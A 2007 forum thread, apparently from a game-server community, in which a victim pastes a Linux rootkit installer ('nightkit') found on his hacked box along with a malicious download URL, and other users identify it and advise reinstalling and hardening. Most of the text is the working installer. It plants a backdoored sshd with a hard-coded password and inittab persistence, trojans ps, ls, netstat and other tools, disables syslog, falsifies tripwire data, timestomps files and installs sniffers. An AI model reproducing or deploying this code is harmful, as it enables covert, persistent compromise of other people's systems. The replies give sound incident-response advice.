ET SERVER BEEN HACKED NEED HELP LOOK OUT

cwerle · 2007-09-26 04:20:44 UTC

some one hacked my linux box and downloaded and installed a file from this adress.DO NOT CLICK “”“http://amaz0n.namepass.nt/.%/nk.gz”"""DO NOT CLICK

This text file was with a bumch of ziped files. Any one know wtF this [censored] is??? My box is curently shutdown and I ran the panic feture to shut down any remote access.

#!/bin/bash

nightkit

by: NightF0X & badc0der

only for their crew — [censored] script kiddos

#vars

PASS=pa55w0rd
PORT=6969
BASEDIR=pwd
SYSLOGCONF="/etc/syslog.conf"
SSHDIR=/lib/libsh.so
HOMEDIR=/usr/lib/libsh
MYIPADDR=/sbin/ifconfig eth0 | grep "inet addr:" | awk -F ' ' ' ' | cut -c6-
BACKUP=/usr/lib/libsh/.backup

#colorz

BLK=‘e[1;30m’
RED=‘e[1;31m’
GRN=‘e[1;32m’
YEL=‘e[1;33m’
BLU=‘e[1;34m’
MAG=‘e[1;35m’
CYN=‘e[1;36m’
WHI=‘e[1;37m’
DRED=‘e[0;31m’
DGRN=‘e[0;32m’
DYEL=‘e[0;33m’
DBLU=‘e[0;34m’
DMAG=‘e[0;35m’
DCYN=‘e[0;36m’
DWHI=‘e[0;37m’
RES=‘e[0m’

unseting some log filezecho “$======================================================$”

unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE
export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

#test if u r root

if [ “$(whoami)” != “root” ]; then

echo “$u f0rgot to local exploit the b0x…u should be$ r3wt [r00t]$ for th1s$”
echo “”
exit
fi

tar zxf ./bin.tgz
tar zxf ./conf.tgz
tar zxf ./lib.tgz
tar zxf ./utils.tgz
cd ./bin; tar zxf ./sshd.tgz
rm -rf ./sshd.tgz
cd $BASEDIR
rm -rf bin.tgz conf.tgz lib.tgz utils.tgz
killall -9 syslogd >/dev/null 2>&1
cd $BASEDIR
#print banner

echo -n “$N0w 1nstalling”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1

echo “”
echo “”
echo “$======================================================$”
echo “$”
echo " __ __ __ __ "
echo " / | / / // / / / / || //|| ======"
echo " / /||/ / __ ____ / / / / ||// || ||"
echo " / / | / / / / / / __ / / / ||\ || ||"
echo " // |/ // /__ / // // /_/ || \ || ||"
echo " //"
echo " // "
echo “$”
echo " version : 1.1"
echo " date : january/2006"
echo " author : NightF0X"
echo " special_thx : Garret a.k.a. badc0der"
echo “”
echo “$======================================================$”
echo “”
echo “”

sleep 1

#server infos

echo “$ Server informations:”
echo “”
echo " $hostname$ = $hostname -f ($MYIPADDR)"
echo " $kernel$ = $uname -rvo"
echo -n " $distrib $ = $"
if [ -f /etc/redhat-release ]; then
echo -n “head -1 /etc/redhat-release$”
elif [ -f /etc/slackware-version ]; then
echo -n “head -1 /etc/slackware-version$”
elif [ -f /etc/debian_version ]; then
echo -n “head -1 /etc/debian_version$”
elif [ -f /etc/SuSE-release ]; then
echo -n “head -1 /etc/SuSE-release$”
elif [ -f /etc/issue ]; then
echo -n “head -1 /etc/issue$”
else echo -n " unknown$"
fi
echo “”
echo " $uptime$ =$uptime$"
sleep 5

#Verifying the box

echo “”
echo “$ Verifying the b0x:”
echo “”

sleep 1

echo -n " $Checking for remote logging files"
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo “”
echo “”
echo -n “$.”
sleep 1
REMOTE=grep -v "^#" "$SYSLOGCONF" | grep -v "^$" | grep "@" | cut -d '@' -f 2
echo “”
echo “”
if [ ! -z “$REMOTE” ]; then
echo -n “$ DETECTED$”
echo “”
echo “”
echo “$ WARNING!!! REMOTE LOGGING FOUND $”
echo “$ My suggestion is to pwn the logging computer(s): $”
echo “”
echo “$ The computer(s) logging are: $”
for host in $REMOTE; do
echo -n " "
echo $host
done
echo “”
else
echo -n “$ NOT DETECTED$”
fi
echo “”
echo -n " $Checking for malicios admin tools"
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo""

echo -n “$ Checking for tripwire$”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1

uname=uname -n
twd=/var/lib/tripwire/$uname.twd

if [ -d /etc/tripwire ]; then
echo -n “$ DETECTED$”
echo “”
echo “$ WARNING!!! TRIPWIRE FOUND $”

if [ -f /var/lib/tripwire/$uname.twd ]; then
chattr -isa $twd
echo " $Checking for tripwire database$"
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1

echo -n “$ DETECTED$”
echo “”
echo “$ WARNING!!! TRIPWIRE DATABASE FOUND $”
echo “$ We can fix this hehehe$”
echo “”
echo “-----------------------------------------” >> $twd
echo “Tripwire segment-faulted !” >> $twd
echo “-----------------------------------------” >> $twd
echo “” >> $twd
echo "The reasons for this may be: " >> $twd
echo “” >> $twd
echo “corrupted disc-geometry, possible bad disc-sectors” >> $twd
echo “corrupted files while checking for possible change etc.” >> $twd
echo “”
echo “pls. rerun tripwire to build the database again!” >> $twd
echo “” >> $twd
else
echo -n “$ NOT DETECTED$”
fi
else
echo -n “$ NOT DETECTED$”
fi
echo “”

if [ -f /sbin/xlogin ]; then
chattr -isa /sbin/xlogin
chattr -isa /bin/login
mv -f /sbin/xlogin /bin/login
chmod 7455 /bin/login
chattr +isa /bin/login
fi
echo “”
echo -n “$ 1nstalling tr0jans”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1
echo “”
if [ -f /etc/sh.conf ]; then
chattr -isa /etc/sh.conf
rm -rf /etc/sh.conf
fi

if [ ! -f /lib/libproc.a ]; then
mv lib/libproc.a /lib/
fi

if [ ! -f /lib/libproc.so.2.0.6 ]; then
mv lib/libproc.so.2.0.6 /lib/
fi

/sbin/ldconfig >/dev/null 2>&1

if [ -f /.bash_history ]; then
chattr -isa /.bash_history >/dev/null 2>&1
rm -rf /.bash_history
fi

if [ -f /bin/.bash_history ]; then
chattr -isa /bin/.bash_history
rm -rf /bin/.bash_history
fi

if [ ! -f /usr/bin/md5sum ]; then
touch -acmr /bin/ls bin/md5sum
cp bin/md5sum /usr/bin/md5sum
fi
echo “”
if test -n “$1” ; then
echo “$ Using Password : $$1”
cd $BASEDIR/bin
echo -n $1|md5sum > /etc/sh.conf
else
echo “$ Using Password : $$PASS”
echo -n $PASS|md5sum > /etc/sh.conf
fi

touch -acmr /bin/ls /etc/sh.conf
chown -f root:root /etc/sh.conf
chattr +isa /etc/sh.conf

if test -n “$2” ; then
echo “$ Using Port : $$2”
echo “Port $2” >> $BASEDIR/bin/.sh/sshd_config
echo “3 $2” >> $BASEDIR/conf/hosts.h
echo “4 $2” >> $BASEDIR/conf/hosts.h
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
else
echo “$ Using Port : $$PORT”
echo “Port $DEFPORT” >> $BASEDIR/bin/.sh/sshd_config
echo “3 $2” >> $BASEDIR/conf/hosts.h
echo “4 $2” >> $BASEDIR/conf/hosts.h
cat $BASEDIR/bin/.sh/shdcf2 >> $BASEDIR/bin/.sh/sshd_config ; rm -rf $BASEDIR/bin/.sh/shdcf2
mv $BASEDIR/bin/.sh/sshd_config $BASEDIR/bin/.sh/shdcf
fi
echo “”
echo -n “$ Backd00ring some files”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1
echo “”
echo “”
if [ -f /lib/lidps1.so ]; then
chattr -isa /lib/lidps1.so
rm -rf /lib/lidps1.so
fi

if [ -f /usr/include/hosts.h ]; then
chattr -isa /usr/include/hosts.h
rm -rf /usr/include/hosts.h
fi

if [ -f /usr/include/file.h ]; then
chattr -isa /usr/include/file.h
rm -rf /usr/include/file.h
fi

if [ -f /usr/include/log.h ]; then
chattr -isa /usr/include/log.h
rm -rf /usr/include/log.h
fi

if [ -f /usr/include/proc.h ]; then
chattr -isa /usr/include/proc.h
rm -rf /usr/include/proc.h
fi

cd $BASEDIR
mv $BASEDIR/conf/lidps1.so /lib/lidps1.so
touch -acmr /bin/ls /lib/lidps1.so
touch -acmr /bin/ls $BASEDIR/conf/*
mv $BASEDIR/conf/* /usr/include/

if [ -d /lib/libsh.so ]; then
chattr -isa /lib/libsh.so
chattr -isa /lib/libsh.so/*
rm -rf /lib/libsh.so
fi

if [ -d /usr/lib/libsh ]; then
chattr -isa /usr/lib/libsh
chattr -isa /usr/lib/libsh/*
rm -rf /usr/lib/libsh/*
fi

mkdir $SSHDIR
touch -acmr /bin/ls $SSHDIR
mkdir $HOMEDIR
touch -acmr /bin/ls $HOMEDIR

cd $BASEDIR/bin
mv .sh/* $SSHDIR/
mv .sh/.bashrc $HOMEDIR

if [ -f /sbin/ttyload ]; then
chattr -AacdisSu /sbin/ttyload
rm -rf /sbin/ttyload
fi

if [ -f /usr/sbin/ttyload ]; then
chattr -isa /usr/sbin/ttyload
rm -rf /usr/sbin/ttyload
fi

if [ -f /sbin/ttymon ]; then
chattr -isa /sbin/ttymon
rm -rf /sbin/ttymon
fi
mv $SSHDIR/sshd /sbin/ttyload
chmod a+xr /sbin/ttyload
chmod o-w /sbin/ttyload
touch -acmr /bin/ls /sbin/ttyload
chattr +isa /sbin/ttyload
kill -9 pidof ttyload >/dev/null 2>&1

mv $BASEDIR/bin/ttymon /sbin/ttymon
chmod a+xr /sbin/ttymon
touch -acmr /bin/ls /sbin/ttymon
chattr +isa /sbin/ttymon
kill -9 pidof ttymon >/dev/null 2>&1

cp /bin/bash $SSHDIR

chattr -isa /etc/inittab
cat /etc/inittab |grep -v ttyload|grep -v getty > /tmp/.init1
cat /etc/inittab |grep getty > /tmp/.init2
echo “# Loading standard ttys” >> /tmp/.init1
echo “0:2345:once:/usr/sbin/ttyload” >> /tmp/.init1
cat /tmp/.init2 >> /tmp/.init1
echo “” >> /tmp/.init1
echo “# modem getty.” >> /tmp/.init1
echo “# mo:235:respawn:/usr/sbin/mgetty -s 38400 modem” >> /tmp/.init1
echo “” >> /tmp/.init1
echo “# fax getty (hylafax)” >> /tmp/.init1
echo “# mo:35:respawn:/usr/lib/fax/faxgetty /dev/modem” >> /tmp/.init1
echo “” >> /tmp/.init1
echo “# vbox (voice box) getty” >> /tmp/.init1
echo “# I6:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI6” >> /tmp/.init1
echo “# I7:35:respawn:/usr/sbin/vboxgetty -d /dev/ttyI7” >> /tmp/.init1
echo “” >> /tmp/.init1
echo “# end of /etc/inittab” >> /tmp/.init1
echo “/sbin/ttyload -q >/dev/null 2>&1” > /usr/sbin/ttyload
echo “/sbin/ttymon >/dev/null 2>&1” >> /usr/sbin/ttyload
touch -acmr /bin/ls /usr/sbin/ttyload
chmod +x /usr/sbin/ttyload
chattr +isa /usr/sbin/ttyload
/usr/sbin/ttyload >/dev/null 2>&1

touch -amcr /etc/inittab /tmp/.init1
mv -f /tmp/.init1 /etc/inittab
rm -rf /tmp/.init2
echo “”

if [ ! “grep ttyload /etc/inittab” ]; then
echo "$ WARNING - SSHD WONT BE RELOADED UPON RESTART "
echo "$ inittab shuffling probably [censored]-up ! "
fi

if [ -f /sbin/ifconfig ]; then
/usr/bin/md5sum /sbin/ifconfig >> .shmd5
fi

if [ -f /bin/ps ]; then
/usr/bin/md5sum /bin/ps >> .shmd5
fi

if [ -f /bin/ls ]; then
/usr/bin/md5sum /bin/ls >> .shmd5
fi

if [ -f /bin/netstat ]; then
/usr/bin/md5sum /bin/netstat >> .shmd5
fi

if [ -f /usr/bin/find ]; then
/usr/bin/md5sum /usr/bin/find >> .shmd5
fi

if [ -f /usr/bin/top ]; then
/usr/bin/md5sum /usr/bin/top >> .shmd5
fi

if [ -f /usr/sbin/lsof ]; then
/usr/bin/md5sum /usr/sbin/lsof >> .shmd5
fi

if [ -f /usr/bin/slocate ]; then
/usr/bin/md5sum /usr/bin/slocate >> .shmd5
fi

if [ -f /usr/bin/dir ]; then
/usr/bin/md5sum /usr/bin/dir >> .shmd5
fi

if [ -f /usr/bin/md5sum ]; then
/usr/bin/md5sum /usr/bin/md5sum >> .shmd5
fi

if [ ! -f /dev/srd0 ]; then
./encrypt -e .shmd5 /dev/srd0
touch -acmr /bin/ls /dev/srd0
chattr a+r /dev/srd0
chown -f root:root /dev/srd0
fi
rm -rf .shmd5

#time change bitch

touch -acmr /sbin/ifconfig ifconfig >/dev/null 2>&1
touch -acmr /bin/ps ps >/dev/null 2>&1
touch -acmr /bin/ls ls >/dev/null 2>&1
touch -acmr /bin/netstat netstat >/dev/null 2>&1
touch -acmr /usr/bin/find find >/dev/null 2>&1
touch -acmr /usr/bin/top top >/dev/null 2>&1
touch -acmr /usr/sbin/lsof lsof >/dev/null 2>&1
touch -acmr /sbin/syslogd syslogd >/dev/null 2>&1
touch -acmr /usr/bin/slocate slocate >/dev/null 2>&1
touch -acmr /usr/bin/dir dir >/dev/null 2>&1
touch -acmr /usr/bin/md5sum md5sum >/dev/null 2>&1
touch -acmr /usr/bin/pstree pstree >/dev/null 2>&1

Backdoor ps/top/du/ls/netstat/etc…

cd $BASEDIR/bin

BACKUP=/usr/lib/libsh/.backup
mkdir $BACKUP

ps …

if [ -f /usr/bin/ps ]; then
chattr -isa /usr/bin/ps
cp /usr/bin/ps $BACKUP
mv -f ps /usr/bin/ps
chattr +isa /usr/bin/ps
fi

if [ -f /bin/ps ]; then
chattr -isa /bin/ps
cp /bin/ps $BACKUP
mv -f ps /bin/ps
chattr +isa /bin/ps
fi

ifconfig …

chattr -isa /sbin/ifconfig
cp /sbin/ifconfig $BACKUP
mv -f ifconfig /sbin/ifconfig
chattr +isa /sbin/ifconfig

netstat …

if [ -f /usr/sbin/netstat ]; then
chattr -isa /usr/sbin/netstat
mv -f netstat /usr/sbin/netstat
chattr +isa /usr/sbin/netstat
fi

chattr -isa /bin/netstat
cp /bin/netstat $BACKUP
mv -f netstat /bin/netstat
chattr +isa /bin/netstat

top …

if [ -f /usr/bin/top ]; then
chattr -isa /usr/bin/top
cp /usr/bin/top $BACKUP
mv -f top /usr/bin/top
chattr +isa /usr/bin/top
if [ -f /lib/libncurses.so.5 ]; then
ln -s /lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null
fi

if [ -f /usr/lib/libncurses.so.5 ]; then
ln -s /usr/lib/libncurses.so.5 /lib/libncurses.so.4 2>/dev/null
fi
fi

slocate …

if [ -f /usr/bin/slocate ]; then
chattr -isa /usr/bin/slocate
cp /usr/bin/slocate $BACKUP
mv -f slocate /usr/bin/slocate
chattr +isa /usr/bin/slocate
fi

ls …

chattr -isa /bin/ls
cp /bin/ls $BACKUP
mv -f ls /bin/ls
chattr +isa /bin/ls

find …

if [ -f /usr/bin/find ]; then
chattr -isa /usr/bin/find
cp /usr/bin/find $BACKUP
mv -f find /usr/bin/find
chattr +isa /usr/bin/find
fi

dir …

if [ -f /usr/bin/dir ]; then
chattr -isa /usr/bin/dir
cp /usr/bin/dir $BACKUP
mv -f dir /usr/bin/dir
chattr +isa /usr/bin/dir
fi

lsof …

if [ -f /usr/sbin/lsof ]; then
chattr -isa /usr/sbin/lsof
cp /usr/sbin/lsof $BACKUP
mv -f lsof /usr/sbin/lsof
chattr +isa /usr/sbin/lsof
fi

pstree …

if [ -f /usr/bin/pstree ]; then
chattr -isa /usr/bin/pstree
cp /usr/bin/pstree $BACKUP
mv -f pstree /usr/bin/pstree
chattr +isa /usr/bin/pstree
fi

md5sum …

chattr -isa /usr/bin/md5sum
cp /usr/bin/md5sum $BACKUP
mv -f md5sum /usr/bin/md5sum
chattr +isa /usr/bin/md5sum

echo “$ ps/ls/top/netstat/ifconfig/find/ and rest backdoored$”
echo “”
echo -n “$ Moving our filez”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1
echo “”

touch -acmr /bin/ls $BASEDIR/utils
touch -acmr /bin/ls $BASEDIR/utils/*
mv $BASEDIR/utils $HOMEDIR/

mkdir $HOMEDIR/.sniff
mv $BASEDIR/bin/shsniff $HOMEDIR/.sniff/shsniff
mv $BASEDIR/bin/shp $HOMEDIR/.sniff/shp
mv $BASEDIR/bin/shsb $HOMEDIR/shsb
mv $BASEDIR/bin/hide $HOMEDIR/hide

touch -acmr /bin/ls $HOMEDIR/.sniff/shsniff
touch -acmr /bin/ls $HOMEDIR/.sniff/shp
touch -acmr /bin/ls $HOMEDIR/shsb
touch -acmr /bin/ls $HOMEDIR/hide

chmod +x $HOMEDIR/.sniff/*
chmod +x $HOMEDIR/shsb
chmod +x $HOMEDIR/hide

echo “”
echo “$ the filez where moved to $HOMEDIR$”
echo “”
echo -n “$ Checking for vuln-daemons”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1
echo “”
echo “”
ps aux > /tmp/.procs

if [ “cat /tmp/.procs | grep named” ]; then
echo “$ NAMED found - patch it$”
fi

if [ -f /usr/sbin/wu.ftpd ]; then
echo “$ WU-FTPD found - patch it$”
fi

if [ “cat /tmp/.procs | grep smbd” ]; then
echo “$ SAMBA found - patch it$”
fi

if [ “cat /tmp/.procs | grep rpc.statd” ]; then
echo “$ RPC.STATD found - patch it$”
fi

rm -rf /tmp/.procs

netstat -natp > /tmp/.stats

if [ “cat /tmp/.stats | grep 443 | grep http” ]; then
echo “$ MOD_SSL found - patch it$”
fi

rm -rf /tmp/.stats
echo “”
echo -n “$ Checking for other rootkits/backdoors”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1
echo “”
echo “”
mkdir $HOMEDIR/.owned

if [ -f /etc/ttyhash ]; then
chattr -AacdisSu /etc/ttyhash
rm -rf /etc/ttyhash
fi

if [ -d /lib/ldd.so ]; then
chattr -isa /lib/ldd.so
chattr -isa /lib/ldd.so/*
mv /lib/ldd.so $HOMEDIR/.owned/tk8
echo “$ tk8 detected and $OWNED$”
fi

if [ -d /usr/src/.puta ]; then
chattr -isa /usr/src/.puta
chattr -isa /usr/src/.puta/*
mv /usr/src/.puta $HOMEDIR/.owned/tk7
echo “$ tk7 detected and $OWNED$”
fi

if [ -f /usr/sbin/xntpd ]; then
chattr -isa /usr/sbin/xntpd
rm -rf /usr/sbin/xntpd
fi

if [ -d /usr/include/bex ]; then
chattr -isa /usr/info/termcap.info-5.gz; rm -rf /usr/info/termcap.info-5.gz
chattr -isa /usr/include/audit.h; rm -rf /usr/include/audit.h
chattr -isa /usr/include/bex
chattr -isa /usr/include/bex/*
mv /usr/include/bex/ $HOMEDIR/.owned/bex2
if [ -f /var/log/tcp.log ]; then
chattr -isa /var/log/tcp.log
cp /var/log/tcp.log $HOMEDIR/.owned/bex2/snifflog
fi
chattr -isa /usr/bin/sshd2 >/dev/null 2>&1
rm -rf /usr/bin/sshd2 >/dev/null 2>&1
echo “$ beX2 detected and $OWNED$”
fi

if [ -d /dev/tux/ ]; then
chattr -isa /usr/bin/xsf >/dev/null 2>&1
rm -rf /usr/bin/xsf >/dev/null 2>&1
chattr -isa /usr/bin/xchk >/dev/null 2>&1
rm -rf /usr/bin/xchk >/dev/null 2>&1
chattr -isa /dev/tux >/dev/null 2>&1
mv /dev/tux $HOMEDIR/.owned/tuxkit
echo “$ tuxkit detected and $OWNED$”
fi

if [ -f /usr/bin/ssh2d ]; then
chattr -isa /usr/bin/ssh2d
rm -rf /usr/bin/ssh2d
chattr -isa /lib/security/.config/
chattr -isa /lib/security/.config/*
rm -rf /lib/security/.config
echo “$ optickit detected and $OWNED$”
fi

if [ -f /etc/ld.so.hash ]; then
chattr -isa /etc/ld.so.hash
rm -rf /etc/ld.so.hash
fi
echo “”

echo -n “$ Grep’ing stuff from rc.sysinit and inetd.conf”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1
echo “”
echo “”
echo "$ greped what we needed "

if [ -f /etc/rc.d/rc.sysinit ]; then
chattr -isa /etc/rc.d/rc.sysinit
cat /etc/rc.d/rc.sysinit | grep -v “# Xntps (NTPv3 daemon) startup…”| grep -v “/usr/sbin/xntps”| grep -v “/usr/sbin/nscd” > /tmp/.grep
chmod +x /tmp/.grep
touch -acmr /etc/rc.d/rc.sysinit /tmp/.grep
mv -f /tmp/.grep /etc/rc.d/rc.sysinit
rm -rf /tmp/.grep
fi

if [ -f /etc/inetd.conf ]; then
chattr -isa /etc/inetd.conf
cat /etc/inetd.conf | grep -v “6635”| grep -v “9705” > /tmp/.grep
touch -acmr /etc/inted.conf /tmp/.grep
mv -f /tmp/.grep /etc/inetd.conf
rm -rf /tmp/.grep
fi

echo “”

echo -n “$ Killing some daemons”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1
echo “”
echo “”
echo “$ daemons successfully killed$”

killall -9 -q nscd >/dev/null 2>&1
killall -9 -q xntps >/dev/null 2>&1
killall -9 -q mountd >/dev/null 2>&1
killall -9 -q mserv >/dev/null 2>&1
killall -9 -q psybnc >/dev/null 2>&1
killall -9 -q t0rns >/dev/null 2>&1
killall -9 -q linsniffer >/dev/null 2>&1
killall -9 -q sniffer >/dev/null 2>&1
killall -9 -q lpsched >/dev/null 2>&1
killall -9 -q sniff >/dev/null 2>&1
killall -9 -q sn1f >/dev/null 2>&1
killall -9 -q sshd2 >/dev/null 2>&1
killall -9 -q xsf >/dev/null 2>&1
killall -9 -q xchk >/dev/null 2>&1
killall -9 -q ssh2d >/dev/null 2>&1

rm -rf /tmp/info_tmp

echo “”
echo -n “$ ipchains/iptables testing”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1
echo “”
echo “”

if [ -f /sbin/ipchains ]; then
echo “$/sbin/ipchains -L input | head -5$”
else
echo “$ ipchains$ NOT FOUND$”
fi

if [ -f /sbin/iptables ]; then
echo “$/sbin/iptables -L input | head -5$”
else
echo “$ iptables$ NOT FOUND$”
fi

echo “”
echo -n “$ Cleaning logs”
echo -n “$.”
sleep 1
echo -n “$.”
sleep 1
echo -n “$.$”
sleep 1
echo “”
echo “”

if [ -f /usr/sbin/syslogd ]; then
/usr/sbin/syslogd -m 0
else
/sbin/syslogd -m 0
fi

if [ -f /usr/sbin/inetd ]; then
killall -HUP inetd >/dev/null 2>&1
elif [ -f /usr/sbin/xinetd ]; then
killall -HUP xinetd
fi

cd $BASEDIR
rm -rf …/nk*
rm -rf …/nk.tgz
rm -rf …/hat
rm -rf …/own
echo “$ NightKIT installed. ENJOY$”
killall -9 hat
killall -9 own

jaybird · 2007-09-26 04:34:49 UTC

That’s a root kit installer. What he’s doing is attempting to clean his tracks (by cleansing log files, etc), install a backdoor, and modify crucial system files that hide the backdoor. He didn’t do a good job if you found that file.

This is bad, and at this point you really should wipe your server and restart, because chances are you won’t find everything that was done.

cwerle · 2007-09-26 17:53:12 UTC

Any idea how he got access???

jaybird · 2007-09-26 19:30:59 UTC

That’s the million dollar question

When you reinstall your operating system, I would avoid installing many network servers (i.e. ftp servers, finger servers, web servers, etc). Those you have to install, make absolutely sure you’re using the latest release quality versions, as these usually include fixes for all known exploits.

Honestly, unless you were running a packet capture program, there’s probably no way you’ll figure out how he broke in.

cwerle · 2007-09-26 21:11:24 UTC

To be totaly honest with you the only thing I used this linux box for was to host my clan server and my clan scrim server. So realy nothing else was used on it. Other the VNCserver inbeded in Fedora Core 5. AND NO ONE BUT me had the root password, or the 1 user password.

jaybird · 2007-09-27 14:29:02 UTC

Just because that’s all you used doesn’t mean that’s all that was running. And chances are that the cracker didn’t need to know your password - he probably exploited a known weakness in one of your services to get entry.

SCDS_reyalP · 2007-09-28 00:51:22 UTC

There are several known security issues in various ET versions. None that I know of lead directly to a root compromise, but you ran your server as root (a very bad idea) that may have been responsible. However, since we don’t have any forensic information about your system, there is no way anyone here can tell.

Some known security issues are mentioned here: http://bani.anime.net/banimod/forums/viewtopic.php?t=6512
and here: http://bani.anime.net/banimod/forums/viewtopic.php?t=6777

As Jaybird suggests, your best option is to completely re-install the server, make sure everything is up to date, and run your ET server under an isolated, limited privilege account.

Ragnar_40k · 2007-09-28 12:58:15 UTC

You could use something like UML and install each server in its own user space. Using UML might eat some server performance, but nowadays servers are fast enough, so this little overhead shouldn’t be a problem.

jjpron · 2007-10-06 23:55:47 UTC

You can also install a program “DenyHosts” which monitors your ssh login attempts and blacklists those IPs that constantly fail authorization. (After you do a clean install of course.)
Good luck!